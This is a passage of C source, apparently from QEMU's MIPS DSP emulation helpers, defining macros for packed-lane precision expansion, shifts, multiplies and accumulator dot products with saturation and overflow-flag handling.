MIPSDSP_LO; \ tempA = (rt >> b) & MIPSDSP_LO; \ \ tempBI = (uint32_t)tempB << 16; \ tempAI = (uint32_t)tempA << 16; \ \ return MIPSDSP_RETURN64_32(tempBI, tempAI); \ } PRECEQ_PW(qhl, 48, 32); PRECEQ_PW(qhr, 16, 0); PRECEQ_PW(qhla, 48, 16); PRECEQ_PW(qhra, 32, 0); #undef PRECEQ_PW #endif #define PRECEQU_PH(name, a, b) \ target_ulong helper_precequ_ph_##name(target_ulong rt) \ { \ uint16_t tempB, tempA; \ \ tempB = (rt >> a) & MIPSDSP_Q0; \ tempA = (rt >> b) & MIPSDSP_Q0; \ \ tempB = tempB << 7; \ tempA = tempA << 7; \ \ return MIPSDSP_RETURN32_16(tempB, tempA); \ } PRECEQU_PH(qbl, 24, 16); PRECEQU_PH(qbr, 8, 0); PRECEQU_PH(qbla, 24, 8); PRECEQU_PH(qbra, 16, 0); #undef PRECEQU_PH #if defined(TARGET_MIPS64) #define PRECEQU_QH(name, a, b, c, d) \ target_ulong helper_precequ_qh_##name(target_ulong rt) \ { \ uint16_t tempD, tempC, tempB, tempA; \ \ tempD = (rt >> a) & MIPSDSP_Q0; \ tempC = (rt >> b) & MIPSDSP_Q0; \ tempB = (rt >> c) & MIPSDSP_Q0; \ tempA = (rt >> d) & MIPSDSP_Q0; \ \ tempD = tempD << 7; \ tempC = tempC << 7; \ tempB = tempB << 7; \ tempA = tempA << 7; \ \ return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ } PRECEQU_QH(obl, 56, 48, 40, 32); PRECEQU_QH(obr, 24, 16, 8, 0); PRECEQU_QH(obla, 56, 40, 24, 8); PRECEQU_QH(obra, 48, 32, 16, 0); #undef PRECEQU_QH #endif #define PRECEU_PH(name, a, b) \ target_ulong helper_preceu_ph_##name(target_ulong rt) \ { \ uint16_t tempB, tempA; \ \ tempB = (rt >> a) & MIPSDSP_Q0; \ tempA = (rt >> b) & MIPSDSP_Q0; \ \ return MIPSDSP_RETURN32_16(tempB, tempA); \ } PRECEU_PH(qbl, 24, 16); PRECEU_PH(qbr, 8, 0); PRECEU_PH(qbla, 24, 8); PRECEU_PH(qbra, 16, 0); #undef PRECEU_PH #if defined(TARGET_MIPS64) #define PRECEU_QH(name, a, b, c, d) \ target_ulong helper_preceu_qh_##name(target_ulong rt) \ { \ uint16_t tempD, tempC, tempB, 
tempA; \ \ tempD = (rt >> a) & MIPSDSP_Q0; \ tempC = (rt >> b) & MIPSDSP_Q0; \ tempB = (rt >> c) & MIPSDSP_Q0; \ tempA = (rt >> d) & MIPSDSP_Q0; \ \ return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ } PRECEU_QH(obl, 56, 48, 40, 32); PRECEU_QH(obr, 24, 16, 8, 0); PRECEU_QH(obla, 56, 40, 24, 8); PRECEU_QH(obra, 48, 32, 16, 0); #undef PRECEU_QH #endif /** DSP GPR-Based Shift Sub-class insns **/ #define SHIFT_QB(name, func) \ target_ulong helper_##name##_qb(target_ulong sa, target_ulong rt) \ { \ uint8_t rt3, rt2, rt1, rt0; \ \ sa = sa & 0x07; \ \ MIPSDSP_SPLIT32_8(rt, rt3, rt2, rt1, rt0); \ \ rt3 = mipsdsp_##func(rt3, sa); \ rt2 = mipsdsp_##func(rt2, sa); \ rt1 = mipsdsp_##func(rt1, sa); \ rt0 = mipsdsp_##func(rt0, sa); \ \ return MIPSDSP_RETURN32_8(rt3, rt2, rt1, rt0); \ } #define SHIFT_QB_ENV(name, func) \ target_ulong helper_##name##_qb(target_ulong sa, target_ulong rt,\ CPUMIPSState *env) \ { \ uint8_t rt3, rt2, rt1, rt0; \ \ sa = sa & 0x07; \ \ MIPSDSP_SPLIT32_8(rt, rt3, rt2, rt1, rt0); \ \ rt3 = mipsdsp_##func(rt3, sa, env); \ rt2 = mipsdsp_##func(rt2, sa, env); \ rt1 = mipsdsp_##func(rt1, sa, env); \ rt0 = mipsdsp_##func(rt0, sa, env); \ \ return MIPSDSP_RETURN32_8(rt3, rt2, rt1, rt0); \ } SHIFT_QB_ENV(shll, lshift8); SHIFT_QB(shrl, rshift_u8); SHIFT_QB(shra, rashift8); SHIFT_QB(shra_r, rnd8_rashift); #undef SHIFT_QB #undef SHIFT_QB_ENV #if defined(TARGET_MIPS64) #define SHIFT_OB(name, func) \ target_ulong helper_##name##_ob(target_ulong rt, target_ulong sa) \ { \ int i; \ uint8_t rt_t[8]; \ uint64_t temp; \ \ sa = sa & 0x07; \ temp = 0; \ \ for (i = 0; i < 8; i++) { \ rt_t[i] = (rt >> (8 * i)) & MIPSDSP_Q0; \ rt_t[i] = mipsdsp_##func(rt_t[i], sa); \ temp |= (uint64_t)rt_t[i] << (8 * i); \ } \ \ return temp; \ } #define SHIFT_OB_ENV(name, func) \ target_ulong helper_##name##_ob(target_ulong rt, target_ulong sa, \ CPUMIPSState *env) \ { \ int i; \ uint8_t rt_t[8]; \ uint64_t temp; \ \ sa = sa & 0x07; \ temp = 0; \ \ for (i = 0; i < 8; i++) { \ rt_t[i] = (rt >> (8 * i)) & MIPSDSP_Q0; \ rt_t[i] = mipsdsp_##func(rt_t[i], sa, env); \ temp |= (uint64_t)rt_t[i] << (8 * i); \ } \ \ return temp; \ } SHIFT_OB_ENV(shll, lshift8); SHIFT_OB(shrl, rshift_u8); SHIFT_OB(shra, rashift8); SHIFT_OB(shra_r, rnd8_rashift); #undef SHIFT_OB #undef SHIFT_OB_ENV #endif #define SHIFT_PH(name, func) \ target_ulong helper_##name##_ph(target_ulong sa, target_ulong rt, \ CPUMIPSState *env) \ { \ uint16_t rth, rtl; \ \ sa = sa & 0x0F; \ \ MIPSDSP_SPLIT32_16(rt, rth, rtl); \ \ rth = mipsdsp_##func(rth, sa, env); \ rtl = mipsdsp_##func(rtl, sa, env); \ \ return MIPSDSP_RETURN32_16(rth, rtl); \ } SHIFT_PH(shll, lshift16); SHIFT_PH(shll_s, sat16_lshift); #undef SHIFT_PH #if defined(TARGET_MIPS64) #define SHIFT_QH(name, func) \ target_ulong helper_##name##_qh(target_ulong rt, target_ulong sa) \ { \ uint16_t rt3, rt2, rt1, rt0; \ \ sa = sa & 0x0F; \ \ MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ \ rt3 = mipsdsp_##func(rt3, sa); \ rt2 = mipsdsp_##func(rt2, sa); \ rt1 = mipsdsp_##func(rt1, sa); \ rt0 = mipsdsp_##func(rt0, sa); \ \ return MIPSDSP_RETURN64_16(rt3, rt2, rt1, rt0); \ } #define SHIFT_QH_ENV(name, func) \ target_ulong helper_##name##_qh(target_ulong rt, target_ulong sa, \ CPUMIPSState *env) \ { \ uint16_t rt3, rt2, rt1, rt0; \ \ sa = sa & 0x0F; \ \ MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ \ rt3 = mipsdsp_##func(rt3, sa, env); \ rt2 = mipsdsp_##func(rt2, sa, env); \ rt1 = mipsdsp_##func(rt1, sa, env); \ rt0 = mipsdsp_##func(rt0, sa, env); \ \ return MIPSDSP_RETURN64_16(rt3, rt2, rt1, rt0); \ } 
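/*
 * Editor's note, not part of the original source: a short worked
 * example of the saturating shift helpers instantiated below. For the
 * 32-bit shll_s.ph case, mipsdsp_sat16_lshift(0x2000, 2, env) shifts
 * Q15 +0.25 left into 0x8000, flipping the sign bit; the helper
 * detects this from the discarded bits, saturates the lane to 0x7FFF
 * and sets the ouflag bit 22 in DSPControl. Illustrative sketch only;
 * the function name is hypothetical.
 */
#if 0 /* illustrative sketch, not compiled */
static uint16_t example_shll_s_lane(CPUMIPSState *env)
{
    /* 0x2000 << 2 = 0x8000 overflows positive Q15, so the lane
     * saturates to 0x7FFF and DSPControl[22] is set. */
    return mipsdsp_sat16_lshift(0x2000, 2, env); /* == 0x7FFF */
}
#endif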
SHIFT_QH_ENV(shll, lshift16); SHIFT_QH_ENV(shll_s, sat16_lshift); SHIFT_QH(shrl, rshift_u16); SHIFT_QH(shra, rashift16); SHIFT_QH(shra_r, rnd16_rashift); #undef SHIFT_QH #undef SHIFT_QH_ENV #endif #define SHIFT_W(name, func) \ target_ulong helper_##name##_w(target_ulong sa, target_ulong rt) \ { \ uint32_t temp; \ \ sa = sa & 0x1F; \ temp = mipsdsp_##func(rt, sa); \ \ return (target_long)(int32_t)temp; \ } #define SHIFT_W_ENV(name, func) \ target_ulong helper_##name##_w(target_ulong sa, target_ulong rt, \ CPUMIPSState *env) \ { \ uint32_t temp; \ \ sa = sa & 0x1F; \ temp = mipsdsp_##func(rt, sa, env); \ \ return (target_long)(int32_t)temp; \ } SHIFT_W_ENV(shll_s, sat32_lshift); SHIFT_W(shra_r, rnd32_rashift); #undef SHIFT_W #undef SHIFT_W_ENV #if defined(TARGET_MIPS64) #define SHIFT_PW(name, func) \ target_ulong helper_##name##_pw(target_ulong rt, target_ulong sa) \ { \ uint32_t rt1, rt0; \ \ sa = sa & 0x1F; \ MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ \ rt1 = mipsdsp_##func(rt1, sa); \ rt0 = mipsdsp_##func(rt0, sa); \ \ return MIPSDSP_RETURN64_32(rt1, rt0); \ } #define SHIFT_PW_ENV(name, func) \ target_ulong helper_##name##_pw(target_ulong rt, target_ulong sa, \ CPUMIPSState *env) \ { \ uint32_t rt1, rt0; \ \ sa = sa & 0x1F; \ MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ \ rt1 = mipsdsp_##func(rt1, sa, env); \ rt0 = mipsdsp_##func(rt0, sa, env); \ \ return MIPSDSP_RETURN64_32(rt1, rt0); \ } SHIFT_PW_ENV(shll, lshift32); SHIFT_PW_ENV(shll_s, sat32_lshift); SHIFT_PW(shra, rashift32); SHIFT_PW(shra_r, rnd32_rashift); #undef SHIFT_PW #undef SHIFT_PW_ENV #endif #define SHIFT_PH(name, func) \ target_ulong helper_##name##_ph(target_ulong sa, target_ulong rt) \ { \ uint16_t rth, rtl; \ \ sa = sa & 0x0F; \ \ MIPSDSP_SPLIT32_16(rt, rth, rtl); \ \ rth = mipsdsp_##func(rth, sa); \ rtl = mipsdsp_##func(rtl, sa); \ \ return MIPSDSP_RETURN32_16(rth, rtl); \ } SHIFT_PH(shrl, rshift_u16); SHIFT_PH(shra, rashift16); SHIFT_PH(shra_r, rnd16_rashift); #undef SHIFT_PH /** DSP Multiply Sub-class insns **/ /* * Return value made up of two 16-bit values. * FIXME give the macro a better name.
*/ #define MUL_RETURN32_16_PH(name, func, \ rsmov1, rsmov2, rsfilter, \ rtmov1, rtmov2, rtfilter) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ uint16_t rsB, rsA, rtB, rtA; \ \ rsB = (rs >> rsmov1) & rsfilter; \ rsA = (rs >> rsmov2) & rsfilter; \ rtB = (rt >> rtmov1) & rtfilter; \ rtA = (rt >> rtmov2) & rtfilter; \ \ rsB = mipsdsp_##func(rsB, rtB, env); \ rsA = mipsdsp_##func(rsA, rtA, env); \ \ return MIPSDSP_RETURN32_16(rsB, rsA); \ } MUL_RETURN32_16_PH(muleu_s_ph_qbl, mul_u8_u16, \ 24, 16, MIPSDSP_Q0, \ 16, 0, MIPSDSP_LO); MUL_RETURN32_16_PH(muleu_s_ph_qbr, mul_u8_u16, \ 8, 0, MIPSDSP_Q0, \ 16, 0, MIPSDSP_LO); MUL_RETURN32_16_PH(mulq_rs_ph, rndq15_mul_q15_q15, \ 16, 0, MIPSDSP_LO, \ 16, 0, MIPSDSP_LO); MUL_RETURN32_16_PH(mul_ph, mul_i16_i16, \ 16, 0, MIPSDSP_LO, \ 16, 0, MIPSDSP_LO); MUL_RETURN32_16_PH(mul_s_ph, sat16_mul_i16_i16, \ 16, 0, MIPSDSP_LO, \ 16, 0, MIPSDSP_LO); MUL_RETURN32_16_PH(mulq_s_ph, sat16_mul_q15_q15, \ 16, 0, MIPSDSP_LO, \ 16, 0, MIPSDSP_LO); #undef MUL_RETURN32_16_PH #define MUL_RETURN32_32_ph(name, func, movbits) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsh, rth; \ int32_t temp; \ \ rsh = (rs >> movbits) & MIPSDSP_LO; \ rth = (rt >> movbits) & MIPSDSP_LO; \ temp = mipsdsp_##func(rsh, rth, env); \ \ return (target_long)(int32_t)temp; \ } MUL_RETURN32_32_ph(muleq_s_w_phl, mul_q15_q15_overflowflag21, 16); MUL_RETURN32_32_ph(muleq_s_w_phr, mul_q15_q15_overflowflag21, 0); #undef MUL_RETURN32_32_ph #define MUL_VOID_PH(name, use_ac_env) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsh, rsl, rth, rtl; \ int32_t tempB, tempA; \ int64_t acc, dotp; \ \ MIPSDSP_SPLIT32_16(rs, rsh, rsl); \ MIPSDSP_SPLIT32_16(rt, rth, rtl); \ \ if (use_ac_env == 1) { \ tempB = mipsdsp_mul_q15_q15(ac, rsh, rth, env); \ tempA = mipsdsp_mul_q15_q15(ac, rsl, rtl, env); \ } else { \ tempB = mipsdsp_mul_u16_u16(rsh, rth); \ tempA = mipsdsp_mul_u16_u16(rsl, rtl); \ } \ \ dotp = (int64_t)tempB - (int64_t)tempA; \ acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ dotp = dotp + acc; \ env->active_tc.HI[ac] = (target_long)(int32_t) \ ((dotp & MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t)(dotp & MIPSDSP_LLO); \ } MUL_VOID_PH(mulsaq_s_w_ph, 1); MUL_VOID_PH(mulsa_w_ph, 0); #undef MUL_VOID_PH #if defined(TARGET_MIPS64) #define MUL_RETURN64_16_QH(name, func, \ rsmov1, rsmov2, rsmov3, rsmov4, rsfilter, \ rtmov1, rtmov2, rtmov3, rtmov4, rtfilter) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ uint16_t rs3, rs2, rs1, rs0; \ uint16_t rt3, rt2, rt1, rt0; \ uint16_t tempD, tempC, tempB, tempA; \ \ rs3 = (rs >> rsmov1) & rsfilter; \ rs2 = (rs >> rsmov2) & rsfilter; \ rs1 = (rs >> rsmov3) & rsfilter; \ rs0 = (rs >> rsmov4) & rsfilter; \ rt3 = (rt >> rtmov1) & rtfilter; \ rt2 = (rt >> rtmov2) & rtfilter; \ rt1 = (rt >> rtmov3) & rtfilter; \ rt0 = (rt >> rtmov4) & rtfilter; \ \ tempD = mipsdsp_##func(rs3, rt3, env); \ tempC = mipsdsp_##func(rs2, rt2, env); \ tempB = mipsdsp_##func(rs1, rt1, env); \ tempA = mipsdsp_##func(rs0, rt0, env); \ \ return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ } MUL_RETURN64_16_QH(muleu_s_qh_obl, mul_u8_u16, \ 56, 48, 40, 32, MIPSDSP_Q0, \ 48, 32, 16, 0, MIPSDSP_LO); MUL_RETURN64_16_QH(muleu_s_qh_obr, mul_u8_u16, \ 24, 16, 8, 0, MIPSDSP_Q0, \ 48, 32, 16, 0, MIPSDSP_LO); MUL_RETURN64_16_QH(mulq_rs_qh, 
rndq15_mul_q15_q15, \ 48, 32, 16, 0, MIPSDSP_LO, \ 48, 32, 16, 0, MIPSDSP_LO); #undef MUL_RETURN64_16_QH #define MUL_RETURN64_32_QH(name, \ rsmov1, rsmov2, \ rtmov1, rtmov2) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ uint16_t rsB, rsA; \ uint16_t rtB, rtA; \ uint32_t tempB, tempA; \ \ rsB = (rs >> rsmov1) & MIPSDSP_LO; \ rsA = (rs >> rsmov2) & MIPSDSP_LO; \ rtB = (rt >> rtmov1) & MIPSDSP_LO; \ rtA = (rt >> rtmov2) & MIPSDSP_LO; \ \ tempB = mipsdsp_mul_q15_q15(5, rsB, rtB, env); \ tempA = mipsdsp_mul_q15_q15(5, rsA, rtA, env); \ \ return ((uint64_t)tempB << 32) | (uint64_t)tempA; \ } MUL_RETURN64_32_QH(muleq_s_pw_qhl, 48, 32, 48, 32); MUL_RETURN64_32_QH(muleq_s_pw_qhr, 16, 0, 16, 0); #undef MUL_RETURN64_32_QH void helper_mulsaq_s_w_qh(target_ulong rs, target_ulong rt, uint32_t ac, CPUMIPSState *env) { int16_t rs3, rs2, rs1, rs0; int16_t rt3, rt2, rt1, rt0; int32_t tempD, tempC, tempB, tempA; int64_t acc[2]; int64_t temp[2]; int64_t temp_sum; MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); tempD = mipsdsp_mul_q15_q15(ac, rs3, rt3, env); tempC = mipsdsp_mul_q15_q15(ac, rs2, rt2, env); tempB = mipsdsp_mul_q15_q15(ac, rs1, rt1, env); tempA = mipsdsp_mul_q15_q15(ac, rs0, rt0, env); temp[0] = ((int32_t)tempD - (int32_t)tempC) + ((int32_t)tempB - (int32_t)tempA); temp[0] = (int64_t)(temp[0] << 30) >> 30; if (((temp[0] >> 33) & 0x01) == 0) { temp[1] = 0x00; } else { temp[1] = ~0ull; } acc[0] = env->active_tc.LO[ac]; acc[1] = env->active_tc.HI[ac]; temp_sum = acc[0] + temp[0]; if (((uint64_t)temp_sum < (uint64_t)acc[0]) && ((uint64_t)temp_sum < (uint64_t)temp[0])) { acc[1] += 1; } acc[0] = temp_sum; acc[1] += temp[1]; env->active_tc.HI[ac] = acc[1]; env->active_tc.LO[ac] = acc[0]; } #endif #define DP_QB(name, func, is_add, rsmov1, rsmov2, rtmov1, rtmov2) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ uint8_t rs3, rs2; \ uint8_t rt3, rt2; \ uint16_t tempB, tempA; \ uint64_t tempC, dotp; \ \ rs3 = (rs >> rsmov1) & MIPSDSP_Q0; \ rs2 = (rs >> rsmov2) & MIPSDSP_Q0; \ rt3 = (rt >> rtmov1) & MIPSDSP_Q0; \ rt2 = (rt >> rtmov2) & MIPSDSP_Q0; \ tempB = mipsdsp_##func(rs3, rt3); \ tempA = mipsdsp_##func(rs2, rt2); \ dotp = (int64_t)tempB + (int64_t)tempA; \ if (is_add) { \ tempC = (((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO)) \ + dotp; \ } else { \ tempC = (((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO)) \ - dotp; \ } \ \ env->active_tc.HI[ac] = (target_long)(int32_t) \ ((tempC & MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t)(tempC & MIPSDSP_LLO); \ } DP_QB(dpau_h_qbl, mul_u8_u8, 1, 24, 16, 24, 16); DP_QB(dpau_h_qbr, mul_u8_u8, 1, 8, 0, 8, 0); DP_QB(dpsu_h_qbl, mul_u8_u8, 0, 24, 16, 24, 16); DP_QB(dpsu_h_qbr, mul_u8_u8, 0, 8, 0, 8, 0); #undef DP_QB #if defined(TARGET_MIPS64) #define DP_OB(name, add_sub, \ rsmov1, rsmov2, rsmov3, rsmov4, \ rtmov1, rtmov2, rtmov3, rtmov4) \ void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ CPUMIPSState *env) \ { \ uint8_t rsD, rsC, rsB, rsA; \ uint8_t rtD, rtC, rtB, rtA; \ uint16_t tempD, tempC, tempB, tempA; \ uint64_t temp[2]; \ uint64_t acc[2]; \ uint64_t temp_sum; \ \ temp[0] = 0; \ temp[1] = 0; \ \ rsD = (rs >> rsmov1) & MIPSDSP_Q0; \ rsC = (rs >> rsmov2) & MIPSDSP_Q0; \ rsB = (rs >> rsmov3) & MIPSDSP_Q0; \ rsA = (rs >> rsmov4) & MIPSDSP_Q0; \ rtD = (rt >> rtmov1) & MIPSDSP_Q0; \ rtC = (rt >> rtmov2) & 
MIPSDSP_Q0; \ rtB = (rt >> rtmov3) & MIPSDSP_Q0; \ rtA = (rt >> rtmov4) & MIPSDSP_Q0; \ \ tempD = mipsdsp_mul_u8_u8(rsD, rtD); \ tempC = mipsdsp_mul_u8_u8(rsC, rtC); \ tempB = mipsdsp_mul_u8_u8(rsB, rtB); \ tempA = mipsdsp_mul_u8_u8(rsA, rtA); \ \ temp[0] = (uint64_t)tempD + (uint64_t)tempC + \ (uint64_t)tempB + (uint64_t)tempA; \ \ acc[0] = env->active_tc.LO[ac]; \ acc[1] = env->active_tc.HI[ac]; \ \ if (add_sub) { \ temp_sum = acc[0] + temp[0]; \ if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ acc[1] += 1; \ } \ temp[0] = temp_sum; \ temp[1] = acc[1] + temp[1]; \ } else { \ temp_sum = acc[0] - temp[0]; \ if ((uint64_t)temp_sum > (uint64_t)acc[0]) { \ acc[1] -= 1; \ } \ temp[0] = temp_sum; \ temp[1] = acc[1] - temp[1]; \ } \ \ env->active_tc.HI[ac] = temp[1]; \ env->active_tc.LO[ac] = temp[0]; \ } DP_OB(dpau_h_obl, 1, 56, 48, 40, 32, 56, 48, 40, 32); DP_OB(dpau_h_obr, 1, 24, 16, 8, 0, 24, 16, 8, 0); DP_OB(dpsu_h_obl, 0, 56, 48, 40, 32, 56, 48, 40, 32); DP_OB(dpsu_h_obr, 0, 24, 16, 8, 0, 24, 16, 8, 0); #undef DP_OB #endif #define DP_NOFUNC_PH(name, is_add, rsmov1, rsmov2, rtmov1, rtmov2) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsB, rsA, rtB, rtA; \ int32_t tempA, tempB; \ int64_t acc; \ \ rsB = (rs >> rsmov1) & MIPSDSP_LO; \ rsA = (rs >> rsmov2) & MIPSDSP_LO; \ rtB = (rt >> rtmov1) & MIPSDSP_LO; \ rtA = (rt >> rtmov2) & MIPSDSP_LO; \ \ tempB = (int32_t)rsB * (int32_t)rtB; \ tempA = (int32_t)rsA * (int32_t)rtA; \ \ acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ \ if (is_add) { \ acc = acc + ((int64_t)tempB + (int64_t)tempA); \ } else { \ acc = acc - ((int64_t)tempB + (int64_t)tempA); \ } \ \ env->active_tc.HI[ac] = (target_long)(int32_t)((acc & MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t)(acc & MIPSDSP_LLO); \ } DP_NOFUNC_PH(dpa_w_ph, 1, 16, 0, 16, 0); DP_NOFUNC_PH(dpax_w_ph, 1, 16, 0, 0, 16); DP_NOFUNC_PH(dps_w_ph, 0, 16, 0, 16, 0); DP_NOFUNC_PH(dpsx_w_ph, 0, 16, 0, 0, 16); #undef DP_NOFUNC_PH #define DP_HASFUNC_PH(name, is_add, rsmov1, rsmov2, rtmov1, rtmov2) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsB, rsA, rtB, rtA; \ int32_t tempB, tempA; \ int64_t acc, dotp; \ \ rsB = (rs >> rsmov1) & MIPSDSP_LO; \ rsA = (rs >> rsmov2) & MIPSDSP_LO; \ rtB = (rt >> rtmov1) & MIPSDSP_LO; \ rtA = (rt >> rtmov2) & MIPSDSP_LO; \ \ tempB = mipsdsp_mul_q15_q15(ac, rsB, rtB, env); \ tempA = mipsdsp_mul_q15_q15(ac, rsA, rtA, env); \ \ dotp = (int64_t)tempB + (int64_t)tempA; \ acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ \ if (is_add) { \ acc = acc + dotp; \ } else { \ acc = acc - dotp; \ } \ \ env->active_tc.HI[ac] = (target_long)(int32_t) \ ((acc & MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t) \ (acc & MIPSDSP_LLO); \ } DP_HASFUNC_PH(dpaq_s_w_ph, 1, 16, 0, 16, 0); DP_HASFUNC_PH(dpaqx_s_w_ph, 1, 16, 0, 0, 16); DP_HASFUNC_PH(dpsq_s_w_ph, 0, 16, 0, 16, 0); DP_HASFUNC_PH(dpsqx_s_w_ph, 0, 16, 0, 0, 16); #undef DP_HASFUNC_PH #define DP_128OPERATION_PH(name, is_add) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsh, rsl, rth, rtl; \ int32_t tempB, tempA, tempC62_31, tempC63; \ int64_t acc, dotp, tempC; \ \ MIPSDSP_SPLIT32_16(rs, rsh, rsl); \ MIPSDSP_SPLIT32_16(rt, rth, rtl); \ \ tempB = mipsdsp_mul_q15_q15(ac, rsh, rtl, env); \ tempA 
= mipsdsp_mul_q15_q15(ac, rsl, rth, env); \
    \
    dotp = (int64_t)tempB + (int64_t)tempA; \
    acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \
          ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \
    if (is_add) { \
        tempC = acc + dotp; \
    } else { \
        tempC = acc - dotp; \
    } \
    tempC63 = (tempC >> 63) & 0x01; \
    tempC62_31 = (tempC >> 31) & 0xFFFFFFFF; \
    \
    if ((tempC63 == 0) && (tempC62_31 != 0x00000000)) { \
        tempC = 0x7FFFFFFF; \
        set_DSPControl_overflow_flag(1, 16 + ac, env); \
    } \
    \
    if ((tempC63 == 1) && (tempC62_31 != 0xFFFFFFFF)) { \
        tempC = (int64_t)(int32_t)0x80000000; \
        set_DSPControl_overflow_flag(1, 16 + ac, env); \
    } \
    \
    env->active_tc.HI[ac] = (target_long)(int32_t) \
        ((tempC & MIPSDSP_LHI) >> 32); \
    env->active_tc.LO[ac] = (target_long)(int32_t) \
        (tempC & MIPSDSP_LLO); \
}

DP_128OPERATION_PH(dpaqx_sa_w_ph, 1);
DP_128OPERATION_PH(dpsqx_sa_w_ph, 0);

#undef DP_128OPERATION_PH

#if defined(TARGET_MIPS64)
#define DP_QH(name, is_add, use_ac_env) \
void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \
                   CPUMIPSState *env) \
{ \
    int32_t rs3, rs2, rs1, rs0; \
    int32_t rt3, rt2, rt1, rt0; \
    int32_t tempD, tempC, tempB, tempA; \
    int64_t acc[2]; \
    int64_t temp[2]; \
    int64_t temp_sum; \
    \
    MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); \
    MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \
    \
    if (use_ac_env) { \
        tempD = mipsdsp_mul_q15_q15(ac, rs3, rt3, env); \
        tempC = mipsdsp_mul_q15_q15(ac, rs2, rt2, env); \
        tempB = mipsdsp_mul_q15_q15(ac, rs1, rt1, env); \
        tempA = mipsdsp_mul_q15_q15(ac, rs0, rt0, env); \
    } else { \
        tempD = mipsdsp_mul_u16_u16(rs3, rt3); \
        tempC = mipsdsp_mul_u16_u16(rs2, rt2); \
        tempB = mipsdsp_mul_u16_u16(rs1, rt1); \
        tempA = mipsdsp_mul_u16_u16(rs0, rt0); \
    } \
    \
    temp[0] = (int64_t)tempD + (int64_t)tempC + \
              (int64_t)tempB + (int64_t)tempA; \
    \
    if (temp[0] >= 0) { \
        temp[1] = 0; \
    } else { \
        temp[1] = ~0ull; \
    } \
    \
    acc[1] = env->active_tc.HI[ac]; \
    acc[0] = env->active_tc.LO[ac]; \
    \
    if (is_add) { \
        temp_sum = acc[0] + temp[0]; \
        if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \
            ((uint64_t)temp_sum < (uint64_t)temp[0])) { \
            acc[1] = acc[1] + 1; \
        } \
        temp[0] = temp_sum; \
        temp[1] = acc[1] + temp[1]; \
    } else { \
        temp_sum = acc[0] - temp[0]; \
        if ((uint64_t)temp_sum > (uint64_t)acc[0]) { \
            acc[1] = acc[1] - 1; \
        } \
        temp[0] = temp_sum; \
        temp[1] = acc[1] - temp[1]; \
    } \
    \
    env->active_tc.HI[ac] = temp[1]; \
    env->active_tc.LO[ac] = temp[0]; \
}

DP_QH(dpa_w_qh, 1, 0);
DP_QH(dpaq_s_w_qh, 1, 1);
DP_QH(dps_w_qh, 0, 0);
DP_QH(dpsq_s_w_qh, 0, 1);
#undef DP_QH
#endif

#define DP_L_W(name, is_add) \
void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \
                   CPUMIPSState *env) \
{ \
    int32_t temp63; \
    int64_t dotp, acc; \
    uint64_t temp; \
    bool overflow; \
    \
    dotp = mipsdsp_mul_q31_q31(ac, rs, rt, env); \
    acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \
          ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \
    if (is_add) { \
        temp = acc + dotp; \
        overflow = MIPSDSP_OVERFLOW_ADD((uint64_t)acc, (uint64_t)dotp, \
                                        temp, (0x01ull << 63)); \
    } else { \
        temp = acc - dotp; \
        overflow = MIPSDSP_OVERFLOW_SUB((uint64_t)acc, (uint64_t)dotp, \
                                        temp, (0x01ull << 63)); \
    } \
    \
    if (overflow) { \
        temp63 = (temp >> 63) & 0x01; \
        if (temp63 == 1) { \
            temp = (0x01ull << 63) - 1; \
        } else { \
            temp = 0x01ull << 63; \
        } \
        \
        set_DSPControl_overflow_flag(1, 16 + ac, env); \
    } \
    \
    env->active_tc.HI[ac] = (target_long)(int32_t) \
        ((temp & MIPSDSP_LHI) >> 32); \
